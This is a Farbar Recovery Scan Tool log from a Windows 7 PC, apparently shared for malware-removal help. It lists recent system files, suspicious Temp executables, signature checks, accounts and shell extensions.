2017-07-11 21:51 - 2017-06-28 21:41 - 001545728 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2017-07-11 21:51 - 2017-06-28 21:28 - 002767872 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2017-07-11 21:51 - 2017-06-28 21:24 - 001314816 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2017-07-11 21:51 - 2017-06-22 07:58 - 003223040 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2017-07-11 21:51 - 2017-06-15 13:23 - 000753664 _____ (Microsoft Corporation) C:\windows\system32\Drivers\http.sys
2017-07-11 21:51 - 2017-06-12 15:54 - 000370920 _____ (Microsoft Corporation) C:\windows\system32\clfs.sys
2017-07-11 21:51 - 2017-06-12 15:54 - 000154856 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ksecpkg.sys
2017-07-11 21:51 - 2017-06-12 15:54 - 000095464 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ksecdd.sys
2017-07-11 21:51 - 2017-06-12 15:49 - 001363456 _____ (Microsoft Corporation) C:\windows\system32\wdc.dll
2017-07-11 21:51 - 2017-06-12 15:49 - 000731648 _____ (Microsoft Corporation) C:\windows\system32\kerberos.dll
2017-07-11 21:51 - 2017-06-12 15:49 - 000594432 _____ (Microsoft Corporation) C:\windows\system32\wvc.dll
2017-07-11 21:51 - 2017-06-12 15:49 - 000475136 _____ (Microsoft Corporation) C:\windows\system32\sysmon.ocx
2017-07-11 21:51 - 2017-06-12 15:49 - 000463872 _____ (Microsoft Corporation) C:\windows\system32\certcli.dll
2017-07-11 21:51 - 2017-06-12 15:49 - 000058880 _____ (Microsoft Corporation) C:\windows\system32\pdhui.dll
2017-07-11 21:51 - 2017-06-12 15:29 - 001227264 _____ (Microsoft Corporation) C:\windows\SysWOW64\wdc.dll
2017-07-11 21:51 - 2017-06-12 15:29 - 000444928 _____ (Microsoft Corporation) C:\windows\SysWOW64\wvc.dll
2017-07-11 21:51 - 2017-06-12 15:29 - 000390144 _____ (Microsoft Corporation) C:\windows\SysWOW64\sysmon.ocx
2017-07-11 21:51 - 2017-06-12 15:28 - 000554496 _____ (Microsoft Corporation) C:\windows\SysWOW64\kerberos.dll
2017-07-11 21:51 - 2017-06-12 15:28 - 000342528 _____ (Microsoft Corporation) C:\windows\SysWOW64\certcli.dll
2017-07-11 21:51 - 2017-06-12 15:28 - 000047104 _____ (Microsoft Corporation) C:\windows\SysWOW64\pdhui.dll
2017-07-11 21:51 - 2017-06-12 15:14 - 000379392 _____ (Microsoft Corporation) C:\windows\system32\msinfo32.exe
2017-07-11 21:51 - 2017-06-12 15:14 - 000172544 _____ (Microsoft Corporation) C:\windows\system32\perfmon.exe
2017-07-11 21:51 - 2017-06-12 15:14 - 000103936 _____ (Microsoft Corporation) C:\windows\system32\resmon.exe
2017-07-11 21:51 - 2017-06-12 15:06 - 000303616 _____ (Microsoft Corporation) C:\windows\SysWOW64\msinfo32.exe
2017-07-11 21:51 - 2017-06-12 15:06 - 000157184 _____ (Microsoft Corporation) C:\windows\SysWOW64\perfmon.exe
2017-07-11 21:51 - 2017-06-12 15:06 - 000103424 _____ (Microsoft Corporation) C:\windows\SysWOW64\resmon.exe
2017-07-11 21:51 - 2017-06-10 08:59 - 000313856 _____ (Microsoft Corporation) C:\windows\system32\Wldap32.dll
2017-07-11 21:51 - 2017-06-10 08:39 - 000271360 _____ (Microsoft Corporation) C:\windows\SysWOW64\Wldap32.dll
2017-07-11 21:51 - 2017-06-09 08:33 - 001680616 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ntfs.sys
2017-07-11 21:51 - 2017-06-06 08:30 - 001867264 _____ (Microsoft Corporation) C:\windows\system32\ExplorerFrame.dll
2017-07-11 21:51 - 2017-06-06 08:12 - 001499648 _____ (Microsoft Corporation) C:\windows\SysWOW64\ExplorerFrame.dll
2017-07-11 21:51 - 2017-05-29 21:56 - 001895656 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tcpip.sys
2017-07-11 21:51 - 2017-05-29 21:56 - 000377576 _____ (Microsoft Corporation) C:\windows\system32\Drivers\netio.sys
2017-07-11 21:51 - 2017-05-29 21:56 - 000287976 _____ (Microsoft Corporation) C:\windows\system32\Drivers\FWPKCLNT.SYS
2017-07-11 21:51 - 2017-05-16 08:35 - 000986856 _____ (Microsoft Corporation) C:\windows\system32\Drivers\dxgkrnl.sys
2017-07-11 21:51 - 2017-05-16 08:35 - 000265448 _____ (Microsoft Corporation) C:\windows\system32\Drivers\dxgmms1.sys
2017-07-11 21:50 - 2017-06-29 19:57 - 002222080 _____ (Microsoft Corporation) C:\windows\system32\mssrch.dll
2017-07-11 21:50 - 2017-06-29 19:57 - 000778240 _____ (Microsoft Corporation) C:\windows\system32\mssvp.dll
2017-07-11 21:50 - 2017-06-29 19:57 - 000491520 _____ (Microsoft Corporation) C:\windows\system32\mssph.dll
2017-07-11 21:50 - 2017-06-29 19:57 - 000288256 _____ (Microsoft Corporation) C:\windows\system32\mssphtb.dll
2017-07-11 21:50 - 2017-06-29 19:57 - 000115200 _____ (Microsoft Corporation) C:\windows\system32\mssitlb.dll
2017-07-11 21:50 - 2017-06-29 19:57 - 000099840 _____ (Microsoft Corporation) C:\windows\system32\mssprxy.dll
2017-07-11 21:50 - 2017-06-29 19:57 - 000075264 _____ (Microsoft Corporation) C:\windows\system32\msscntrs.dll
2017-07-11 21:50 - 2017-06-29 19:57 - 000014336 _____ (Microsoft Corporation) C:\windows\system32\msshooks.dll
2017-07-11 21:50 - 2017-06-29 19:40 - 000591872 _____ (Microsoft Corporation) C:\windows\system32\SearchIndexer.exe
2017-07-11 21:50 - 2017-06-29 19:40 - 000249856 _____ (Microsoft Corporation) C:\windows\system32\SearchProtocolHost.exe
2017-07-11 21:50 - 2017-06-29 19:39 - 000113664 _____ (Microsoft Corporation) C:\windows\system32\SearchFilterHost.exe
2017-07-11 21:50 - 2017-06-29 19:38 - 001400320 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssrch.dll
2017-07-11 21:50 - 2017-06-29 19:38 - 000666624 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssvp.dll
2017-07-11 21:50 - 2017-06-29 19:38 - 000337408 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssph.dll
2017-07-11 21:50 - 2017-06-29 19:38 - 000197120 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssphtb.dll
2017-07-11 21:50 - 2017-06-29 19:38 - 000104448 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssitlb.dll
2017-07-11 21:50 - 2017-06-29 19:38 - 000059392 _____ (Microsoft Corporation) C:\windows\SysWOW64\msscntrs.dll
2017-07-11 21:50 - 2017-06-29 19:38 - 000034816 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssprxy.dll
2017-07-11 21:50 - 2017-06-29 19:27 - 000427520 _____ (Microsoft Corporation) C:\windows\SysWOW64\SearchIndexer.exe
2017-07-11 21:50 - 2017-06-29 19:27 - 000164352 _____ (Microsoft Corporation) C:\windows\SysWOW64\SearchProtocolHost.exe
2017-07-11 21:50 - 2017-06-29 19:26 - 000086528 _____ (Microsoft Corporation) C:\windows\SysWOW64\SearchFilterHost.exe
2017-07-11 21:50 - 2017-06-29 19:26 - 000009728 _____ (Microsoft Corporation) C:\windows\SysWOW64\msshooks.dll
2017-07-11 21:50 - 2017-06-28 23:19 - 002724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2017-07-11 21:50 - 2017-06-28 23:18 - 000004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2017-07-11 21:50 - 2017-06-28 22:35 - 002724864 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb
2017-07-11 21:50 - 2017-06-28 21:29 - 000800768 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2017-07-11 21:50 - 2017-06-28 21:23 - 000710144 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieapfltr.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 001460736 _____ (Microsoft Corporation) C:\windows\system32\lsasrv.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 001212928 _____ (Microsoft Corporation) C:\windows\system32\rpcrt4.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000690688 _____ (Microsoft Corporation) C:\windows\system32\adtschema.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000345600 _____ (Microsoft Corporation) C:\windows\system32\schannel.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000316928 _____ (Microsoft Corporation) C:\windows\system32\msv1_0.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000312320 _____ (Microsoft Corporation) C:\windows\system32\ncrypt.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000210432 _____ (Microsoft Corporation) C:\windows\system32\wdigest.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000190464 _____ (Microsoft Corporation) C:\windows\system32\rpchttp.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000146432 _____ (Microsoft Corporation) C:\windows\system32\msaudite.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000135680 _____ (Microsoft Corporation) C:\windows\system32\sspicli.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000123904 _____ (Microsoft Corporation) C:\windows\system32\bcrypt.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000086528 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000060416 _____ (Microsoft Corporation) C:\windows\system32\msobjs.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000043520 _____ (Microsoft Corporation) C:\windows\system32\cryptbase.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000028672 _____ (Microsoft Corporation) C:\windows\system32\sspisrv.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000028160 _____ (Microsoft Corporation) C:\windows\system32\secur32.dll
2017-07-11 21:50 - 2017-06-12 15:49 - 000022016 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2017-07-11 21:50 - 2017-06-12 15:29 - 000666112 _____ (Microsoft Corporation) C:\windows\SysWOW64\rpcrt4.dll
2017-07-11 21:50 - 2017-06-12 15:29 - 000172032 _____ (Microsoft Corporation) C:\windows\SysWOW64\wdigest.dll
2017-07-11 21:50 - 2017-06-12 15:29 - 000096768 _____ (Microsoft Corporation) C:\windows\SysWOW64\sspicli.dll
2017-07-11 21:50 - 2017-06-12 15:29 - 000082944 _____ (Microsoft Corporation) C:\windows\SysWOW64\bcrypt.dll
2017-07-11 21:50 - 2017-06-12 15:29 - 000065536 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll
2017-07-11 21:50 - 2017-06-12 15:28 - 000690688 _____ (Microsoft Corporation) C:\windows\SysWOW64\adtschema.dll
2017-07-11 21:50 - 2017-06-12 15:28 - 000261120 _____ (Microsoft Corporation) C:\windows\SysWOW64\msv1_0.dll
2017-07-11 21:50 - 2017-06-12 15:28 - 000254464 _____ (Microsoft Corporation) C:\windows\SysWOW64\schannel.dll
2017-07-11 21:50 - 2017-06-12 15:28 - 000223232 _____ (Microsoft Corporation) C:\windows\SysWOW64\ncrypt.dll
2017-07-11 21:50 - 2017-06-12 15:28 - 000146432 _____ (Microsoft Corporation) C:\windows\SysWOW64\msaudite.dll
2017-07-11 21:50 - 2017-06-12 15:28 - 000141312 _____ (Microsoft Corporation) C:\windows\SysWOW64\rpchttp.dll
2017-07-11 21:50 - 2017-06-12 15:28 - 000060416 _____ (Microsoft Corporation) C:\windows\SysWOW64\msobjs.dll
2017-07-11 21:50 - 2017-06-12 15:28 - 000022016 _____ (Microsoft Corporation) C:\windows\SysWOW64\secur32.dll
2017-07-11 21:50 - 2017-06-12 15:28 - 000017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll
2017-07-11 21:50 - 2017-06-12 15:19 - 000064000 _____ (Microsoft Corporation) C:\windows\system32\auditpol.exe
2017-07-11 21:50 - 2017-06-12 15:12 - 000291328 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mrxsmb10.sys
2017-07-11 21:50 - 2017-06-12 15:12 - 000159744 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mrxsmb.sys
2017-07-11 21:50 - 2017-06-12 15:12 - 000129536 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mrxsmb20.sys
2017-07-11 21:50 - 2017-06-12 15:11 - 000030720 _____ (Microsoft Corporation) C:\windows\system32\lsass.exe
2017-07-11 21:50 - 2017-06-12 15:09 - 000050176 _____ (Microsoft Corporation) C:\windows\SysWOW64\auditpol.exe
2017-07-11 21:50 - 2017-06-12 15:05 - 000036352 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptbase.dll
2017-07-11 21:50 - 2017-05-20 21:24 - 000002048 _____ (Microsoft Corporation) C:\windows\system32\tzres.dll
2017-07-11 21:50 - 2017-05-20 21:06 - 000002048 _____ (Microsoft Corporation) C:\windows\SysWOW64\tzres.dll
2017-07-11 21:50 - 2017-05-16 08:30 - 000144384 _____ (Microsoft Corporation) C:\windows\system32\cdd.dll
2017-07-11 21:47 - 2017-05-03 08:34 - 000094952 _____ (Microsoft Corporation) C:\windows\system32\CompatTelRunner.exe
2017-07-11 21:47 - 2017-05-03 08:29 - 001206272 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2017-07-11 21:47 - 2017-05-03 06:05 - 001555968 _____ (Microsoft Corporation) C:\windows\system32\appraiser.dll
2017-07-11 21:47 - 2017-05-03 06:05 - 000620544 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll
2017-07-11 21:47 - 2017-05-03 06:05 - 000535552 _____ (Microsoft Corporation) C:\windows\system32\devinv.dll
2017-07-11 21:47 - 2017-05-03 06:05 - 000325632 _____ (Microsoft Corporation) C:\windows\system32\invagent.dll
2017-07-11 21:47 - 2017-05-03 06:05 - 000311296 _____ (Microsoft Corporation) C:\windows\system32\centel.dll
2017-07-11 21:47 - 2017-05-03 06:05 - 000217088 _____ (Microsoft Corporation) C:\windows\system32\aepic.dll
2017-07-11 21:47 - 2017-05-03 06:05 - 000127488 _____ (Microsoft Corporation) C:\windows\system32\acmigration.dll
2017-07-11 21:47 - 2017-03-22 19:06 - 001691136 _____ (Microsoft Corporation) C:\windows\system32\aitstatic.exe
2017-07-11 21:32 - 2017-07-11 21:48 - 909347779 _____ C:\Users\Kam\Downloads\DraX_v2_r0.zip
2017-07-09 15:09 - 2017-07-29 19:27 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-07-09 14:15 - 2017-07-09 14:15 - 000000842 _____ C:\Users\Kam\Downloads\Ftp paperst1.xml
2017-07-09 14:12 - 2017-07-09 15:10 - 000000000 ____D C:\Users\Kam\AppData\Local\FileZilla
2017-07-09 14:12 - 2017-07-09 14:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client
2017-07-09 14:12 - 2017-07-09 14:12 - 000000000 ____D C:\Program Files\FileZilla FTP Client
2017-07-09 12:47 - 2017-07-09 12:47 - 000000000 ____D C:\Users\Kam\Documents\Takeout
2017-07-09 12:45 - 2017-07-09 12:47 - 412647180 _____ C:\Users\Kam\Downloads\takeout-20170709T194307Z-001.zip
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-07-30 17:48 - 2009-07-13 21:45 - 000024608 ____H C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-07-30 17:48 - 2009-07-13 21:45 - 000024608 ____H C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-07-30 17:47 - 2015-01-05 17:28 - 000000944 _____ C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1368194719-4233992476-1912739653-1000UA.job
2017-07-30 17:46 - 2009-07-13 19:34 - 000000478 _____ C:\windows\win.ini
2017-07-30 17:45 - 2014-02-23 17:18 - 000000000 ____D C:\Users\Kam\AppData\Local\CrashDumps
2017-07-30 17:40 - 2009-07-13 22:08 - 000000006 ____H C:\windows\Tasks\SA.DAT
2017-07-30 17:33 - 2011-10-30 19:29 - 000000000 ____D C:\Program Files (x86)\Java
2017-07-30 17:31 - 2016-11-17 15:12 - 000001945 _____ C:\windows\epplauncher.mif
2017-07-30 17:17 - 2009-07-13 22:13 - 000781298 _____ C:\windows\system32\PerfStringBackup.INI
2017-07-30 17:17 - 2009-07-13 20:20 - 000000000 ____D C:\windows\inf
2017-07-30 17:14 - 2009-07-13 21:45 - 004973776 _____ C:\windows\system32\FNTCACHE.DAT
2017-07-30 17:04 - 2016-01-18 20:00 - 000000000 ____D C:\AdwCleaner
2017-07-30 15:24 - 2014-09-28 18:24 - 000192216 _____ (Malwarebytes) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2017-07-30 15:23 - 2014-09-28 18:23 - 000109272 _____ (Malwarebytes) C:\windows\system32\Drivers\mbamchameleon.sys
2017-07-30 11:47 - 2015-01-05 17:28 - 000000892 _____ C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1368194719-4233992476-1912739653-1000Core.job
2017-07-29 23:08 - 2014-01-11 15:44 - 000000000 ____D C:\Users\Kam\AppData\Roaming\Adobe
2017-07-29 23:07 - 2014-01-14 11:11 - 000113312 _____ C:\Users\Kam\AppData\Local\GDIPFONTCACHEV1.DAT
2017-07-29 23:02 - 2014-02-05 18:15 - 000000000 ____D C:\ProgramData\regid.1986-12.com.adobe
2017-07-29 23:01 - 2011-10-30 19:33 - 000000000 ____D C:\Program Files (x86)\Adobe
2017-07-29 23:00 - 2014-02-05 17:59 - 000001200 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge CS5.1.lnk
2017-07-29 22:58 - 2014-02-05 17:56 - 000001566 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe ExtendScript Toolkit CS5.5.lnk
2017-07-29 22:58 - 2014-02-05 17:56 - 000001394 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Extension Manager CS5.5.lnk
2017-07-29 22:08 - 2012-09-11 13:25 - 000000000 ____D C:\Program Files (x86)\uTorrent
2017-07-29 21:54 - 2012-09-11 13:31 - 000000833 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-07-29 21:45 - 2009-07-13 20:20 - 000000000 ____D C:\Program Files\image IntelliPoint Toolbox
2017-07-24 18:39 - 2014-01-17 22:36 - 000000000 ____D C:\Users\Kam\AppData\Local\Adobe
2017-07-17 17:28 - 2012-07-18 17:13 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-07-16 15:58 - 2009-07-13 20:20 - 000000000 ____D C:\windows\rescache
2017-07-16 15:15 - 2014-12-14 17:39 - 000000000 ____D C:\windows\system32\appraiser
2017-07-12 18:14 - 2013-07-25 07:39 - 000000000 ____D C:\windows\system32\MRT
2017-07-12 18:09 - 2012-10-19 09:04 - 135225752 ____C (Microsoft Corporation) C:\windows\system32\MRT.exe
2017-07-11 21:52 - 2012-07-26 07:36 - 000803328 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerApp.exe
2017-07-11 21:52 - 2012-07-26 07:36 - 000004312 _____ C:\windows\System32\Tasks\Adobe Flash Player Updater
2017-07-11 21:52 - 2012-07-26 07:36 - 000000000 ____D C:\windows\system32\Macromed
2017-07-11 21:52 - 2011-10-30 19:34 - 000144896 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-07-11 21:52 - 2011-10-30 19:34 - 000000000 ____D C:\windows\SysWOW64\Macromed
2017-07-10 22:48 - 2014-08-24 16:35 - 000000000 ____D C:\Users\Kam\AppData\Roaming\FileZilla
2017-06-30 17:08 - 2017-03-30 18:53 - 000002206 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-06-30 17:08 - 2017-03-30 18:53 - 000002194 _____ C:\Users\Public\Desktop\Google Chrome.lnk
==================== Files in the root of some directories =======
2013-05-29 19:57 - 2014-06-13 18:38 - 000003745 _____ () C:\Program Files (x86)\Mozilla Firefoxsafeguard-secure-search.xml
2012-12-17 02:13 - 2012-12-17 02:13 - 002174976 _____ (Advanced Micro Devices Inc.) C:\Program Files (x86)\Common Files\atimpenc.dll
2014-02-06 20:31 - 2015-12-30 23:05 - 000000132 _____ () C:\Users\Kam\AppData\Roaming\Adobe PNG Format CS5 Prefs
2017-07-29 19:14 - 2017-07-29 19:14 - 000140800 _____ () C:\Users\Kam\AppData\Local\installer.dat
2017-07-29 18:37 - 2017-07-29 18:37 - 000000738 _____ () C:\Users\Kam\AppData\Local\recently-used.xbel
2017-05-17 11:32 - 2017-05-17 11:32 - 000125952 _____ () C:\Users\Kam\AppData\Local\report
2016-01-18 15:38 - 2016-01-18 15:38 - 000002560 _____ () C:\Users\Kam\AppData\Local\uninstall.exe
2017-07-29 19:23 - 2017-07-29 20:10 - 000003072 _____ () C:\Users\Kam\AppData\Local\uninstallce.exe
2013-08-09 21:19 - 2016-01-18 18:45 - 000023301 _____ () C:\ProgramData\hpzinstall.log
Some files in TEMP:
====================
2013-12-04 12:26 - 2013-12-04 12:26 - 000000000 _____ () C:\Users\Chef DeeWeaver\AppData\Local\Temp\01fyyjsw.dll
2013-11-01 18:05 - 2013-11-01 18:05 - 002512960 _____ (ooVoo LLC) C:\Users\Chef DeeWeaver\AppData\Local\Temp\4F7B.exe
2013-12-15 21:56 - 2013-12-15 21:56 - 000036864 _____ () C:\Users\Chef DeeWeaver\AppData\Local\Temp\50kbh0je.dll
2013-11-01 17:46 - 2013-11-01 17:48 - 002512960 _____ (ooVoo LLC) C:\Users\Chef DeeWeaver\AppData\Local\Temp\76D7.exe
2013-11-30 20:45 - 2006-01-12 23:46 - 000025088 _____ () C:\Users\Chef DeeWeaver\AppData\Local\Temp\hpfaicm.exe
2013-11-30 20:45 - 2006-01-12 23:46 - 000184832 _____ (Hewlett-Packard) C:\Users\Chef DeeWeaver\AppData\Local\Temp\hpfinst.dll
2013-11-30 20:45 - 2006-01-12 23:46 - 000352768 _____ (Hewlett-Packard) C:\Users\Chef DeeWeaver\AppData\Local\Temp\hpfiui.exe
2013-11-30 20:45 - 2006-01-12 23:46 - 000025600 _____ () C:\Users\Chef DeeWeaver\AppData\Local\Temp\hpfmicm.exe
2013-11-30 23:16 - 2013-11-30 23:20 - 216924864 _____ () C:\Users\Chef DeeWeaver\AppData\Local\Temp\HPInstaller.exe
2013-11-30 21:47 - 2013-11-30 21:47 - 006123336 _____ () C:\Users\Chef DeeWeaver\AppData\Local\Temp\HPPSdr.exe
2013-11-30 20:45 - 2006-01-12 23:46 - 000262144 _____ (HP) C:\Users\Chef DeeWeaver\AppData\Local\Temp\hpzglu04.exe
2013-12-15 17:49 - 2013-12-15 17:53 - 000030048 _____ () C:\Users\Chef DeeWeaver\AppData\Local\Temp\installer.Hack.v1.3.exe
2017-07-29 19:19 - 2017-07-29 19:19 - 000635990 _____ (XwhDtkPcRYWm0SBnxu6o ) C:\Users\Kam\AppData\Local\Temp\browmodule.exe
2017-07-29 19:14 - 2017-07-29 19:14 - 000040995 _____ (Western Visayas College of Science and Technology) C:\Users\Kam\AppData\Local\Temp\fox.exe
2017-07-29 19:16 - 2017-07-29 19:16 - 000024611 _____ (DoxX) C:\Users\Kam\AppData\Local\Temp\max.exe
2017-07-29 19:19 - 2017-07-29 19:19 - 000468321 _____ ( ) C:\Users\Kam\AppData\Local\Temp\Setup.exe
2017-07-29 19:13 - 2017-07-29 19:13 - 003599058 _____ () C:\Users\Kam\AppData\Local\Temp\SetupInstallStart.exe
2017-07-29 19:19 - 2017-07-29 19:18 - 001199825 _____ () C:\Users\Kam\AppData\Local\Temp\unins000.exe
2017-07-29 22:03 - 2017-07-29 22:03 - 002146496 _____ (BitTorrent Inc.) C:\Users\Kam\AppData\Local\Temp\utt9ADE.tmp.exe
2017-07-29 19:18 - 2017-07-29 19:18 - 000696027 _____ (VideoBox ) C:\Users\Kam\AppData\Local\Temp\vbinst.exe
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\SysWOW64\wininit.exe => File is digitally signed
C:\windows\explorer.exe => File is digitally signed
C:\windows\SysWOW64\explorer.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\SysWOW64\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\SysWOW64\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\SysWOW64\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\dnsapi.dll => File is digitally signed
C:\windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
ATTENTION: ==> Could not access BCD.
LastRegBack: 2017-07-16 15:50
==================== End of FRST.txt ============================
ADDITION.TXT
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-07-2017
Ran by Kam (30-07-2017 17:58:04)
Running from C:\Users\Kam\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2012-07-18 23:51:09)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1368194719-4233992476-1912739653-500 - Administrator - Disabled)
Chef DeeWeaver (S-1-5-21-1368194719-4233992476-1912739653-1000 - Administrator - Enabled) => C:\Users\Chef DeeWeaver
Guest (S-1-5-21-1368194719-4233992476-1912739653-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1368194719-4233992476-1912739653-1002 - Limited - Enabled)
Kam (S-1-5-21-1368194719-4233992476-1912739653-1003 - Administrator - Enabled) => C:\Users\Kam
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Kam\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003_Classes\CLSID\{822B4859-CCDD-476C-ABDF-7F7A894A3CB7}\InprocServer32 -> C:\Users\Kam\AppData\Local\Tresorit\v0.8\TresoritExt64_2.dll ()
CustomCLSID: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003_Classes\CLSID\{822B485A-CCDD-476C-ABDF-7F7A894A3CB7}\InprocServer32 -> C:\Users\Kam\AppData\Local\Tresorit\v0.8\TresoritExt64_2.dll ()
CustomCLSID: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003_Classes\CLSID\{822B485B-CCDD-476C-ABDF-7F7A894A3CB7}\InprocServer32 -> C:\Users\Kam\AppData\Local\Tresorit\v0.8\TresoritExt64_2.dll ()
CustomCLSID: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Kam\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {D25B2CAB-8A9A-4517-A9B2-CB5F68A5A802} => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\..\Acrobat Elements\ContextMenu64.dll [2012-01-03] (Adobe Systems Inc.)
ContextMenuHandlers1: [GpgEX] -> {CCD955E4-5C16-4A33-AFDA-A8947A94946B} => C:\Program Files (x86)\GNU\GnuPG\bin\gpgex.dll [2016-08-18] (g10 Code GmbH)
ContextMenuHandlers1: [VirtualCloneDrive] -> {B7056B8E-4F99-44f8-8CBD-282390FE5428} => C:\Program Files (x86)\Elaborate Bytes\VirtualCloneDrive\ElbyVCDShell.dll [2009-12-14] (Elaborate Bytes AG)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers2: [VirtualCloneDrive] -> {B7056B8E-4F99-44f8-8CBD-282390FE5428} => C:\Program Files (x86)\Elaborate Bytes\VirtualCloneDrive\ElbyVCDShell.dll [2009-12-14] (Elaborate Bytes AG)
ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers4: [GpgEX] -> {CCD955E4-5C16-4A33-AFDA-A8947A94946B} => C:\Program Files (x86)\GNU\GnuPG\bin\gpgex.dll [2016-08-18] (g10 Code GmbH)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\windows\system32\igfxpph.dll [2011-04-04] (Intel Corporation)
